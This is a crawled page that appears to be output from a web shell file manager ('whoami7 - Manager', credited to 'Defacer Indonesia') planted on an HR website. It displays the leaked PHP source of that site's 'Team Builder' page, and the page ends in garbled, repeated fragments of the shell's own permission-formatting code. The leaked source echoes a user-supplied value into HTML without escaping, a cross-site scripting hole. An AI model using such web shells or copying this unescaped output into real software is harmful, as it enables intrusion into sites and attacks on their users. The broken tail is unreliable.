whoami7 - Manager

: /home/gracious/hris.graciousphils.com/backup hris employee/ Upload File: files >> /home/gracious/hris.graciousphils.com/backup hris employee/myteam.php <?php session_start(); include('includes/config.php'); ?> <!doctype html> <html lang="en"> <head> <!-- Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- Bootstrap CSS --> <link rel="stylesheet" href="includes/assets/bootstrap.min.css"> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js"></script> <script type="text/javascript" src="scriptteambuilder.js"></script> </head> <body> <?php include('includes/sidebar.php');?> <?php $empid = $_SESSION['empid']; $sql = "SELECT * FROM tbl_signatory WHERE Empid = :empid and Teambuilder = 1"; $query = $dbh -> prepare($sql); $query->bindParam(':empid',$empid,PDO::PARAM_STR); $query->execute(); $results=$query->fetchAll(PDO::FETCH_OBJ); if($query->rowCount() > 0) { foreach($results as $result) { ?> <div class="container" style="padding-top: 100px;"> <form method="POST"> <div class="col-md-12"> <div class="card"> <div class="card-header bg-primary mb-3"> <?php if (isset($_POST['addemployee'])) { $ser = $_POST['search']; $iss = $_POST['superior']; $sql = "UPDATE tblemployees set Superior = :iss where EmpId = :ser"; $query= $dbh->prepare($sql); $query->bindParam(':iss', $iss, PDO::PARAM_STR); $query->bindParam(':ser', $ser, PDO::PARAM_STR); $query->execute(); if($query->rowCount() > 0) { echo "<div class='alert alert-dismissible alert-success'> <button type='button' class='btn-close' data-bs-dismiss='alert'></button> <strong>$ser</strong> is Successfully added to your <strong>TEAM</strong>. </div>"; } else { echo "<div class='alert alert-dismissible alert-danger'> <button type='button' class='btn-close' data-bs-dismiss='alert'></button> Failed to add Employee </div>"; } } ?> <?php if (isset($_POST['removeemployee'])) { $ser = $_POST['search']; $sql = "UPDATE tblemployees set Superior = 0 where EmpId = :ser"; $query= $dbh->prepare($sql); $query->bindParam(':ser', $ser, PDO::PARAM_STR); $query->execute(); if($query->rowCount() > 0) { echo "<div class='alert alert-dismissible alert-success'> <button type='button' class='btn-close' data-bs-dismiss='alert'></button> <strong>$ser</strong> is successfully removed on your <strong>TEAM</strong>. </div>"; } else { echo "<div class='alert alert-dismissible alert-warning'> <button type='button' class='btn-close' data-bs-dismiss='alert'></button> Failed to remove Employee </div>"; } } ?> <h2>Team Builder</h2> </div> <div class="card-body"> <div class="row"> <div class="col-md-3"> <label for="search" style="color:red;">Search Employee Here</label> <input type="hidden" name="superior" id="superior" value="<?php echo htmlentities($_SESSION['empid'])?>"> <input type="text" id="search" name="search" required autocomplete="off" oninput="this.value = this.value.replace(/[^A-z \u00d1 \u00f1]/g, '').replace(/(\..*)\./g, '$1');" class="form-control text-dark" /> <br> <br /> <!-- Suggestions will be displayed in below div. --> <div id="display" class="text-dark"></div> <button type="submit" class="btn btn-info" id="addemployee" name="addemployee">Add</button> <button type="submit" class="btn btn-danger" id="removeemployee" name="removeemployee">Remove</button> </div> <div class="col-md-9"> <table class="table table-hover"> <thead> <tr class="table-primary"> <th>#</th> <th>Bio Code</th> <th>Employee Name</th> <th>Department</th> <th>Company</th> <th>Immediate Superior</th> </tr> </thead> <tbody> <?php $iss = $_SESSION['empid']; $sql = "SELECT * FROM tblemployees where Superior = :iss"; $query= $dbh -> prepare($sql); $query-> bindParam(':iss', $iss, PDO::PARAM_STR); $query-> execute(); $results=$query->fetchAll(PDO::FETCH_OBJ); if($query->rowCount() > 0) { foreach($results as $result) { $sups = $result->Superior; ?> <tr class="table-dark"> <td><?php echo htmlentities($result->id);?></td> <td><?php echo htmlentities($result->EmpId);?></td> <td><?php echo htmlentities($result->LastName . "," . $result->FirstName . " " . $result->MiddleName);?></td> <td><?php echo htmlentities($result->Department);?></td> <td><?php echo htmlentities($result->Company);?></td> <?php $sql = "SELECT * FROM tblemployees where EmpId = :sups"; $query= $dbh -> prepare($sql); $query-> bindParam(':sups', $sups, PDO::PARAM_STR); $query-> execute(); $results=$query->fetchAll(PDO::FETCH_OBJ); if($query->rowCount() > 0) { foreach($results as $result) { ?> <td><?php echo htmlentities($result->LastName . ", " . $result->FirstName . " " . $result->MiddleName);?></td> <?php }} ?> </tr> <?php }}?> </tbody> </table> </div> </div> </div> </div> </div> </form> </div> <!-- <div class="container" style="padding-top: 100px;"> <div class="card"> <div class="card-header"> <h2>Team Builder</h2> </div> <div class="card-body"> <h4>You are not authorized to make action on this form Contact Personnel Department</h4> </div> </div> </div> --> <?php } } else { ?> <div class="container" style="padding-top: 100px;"> <div class="card"> <div class="card-header bg-primary text-white"> <center><h2>Team Builder</h2></center> </div> <div class="card-body text-white bg-dark"> <center> <h4>You are not authorized to make action on this form Contact Personnel Department</h4> </center> </div> <div class="card-footer bg-primary"> </div> </div> </div> <?php } ?> </body> </html> Copyright ©2021 || Defacer Indonesia nfo .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> ?> & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> ?> )); return $info; } ?> ?>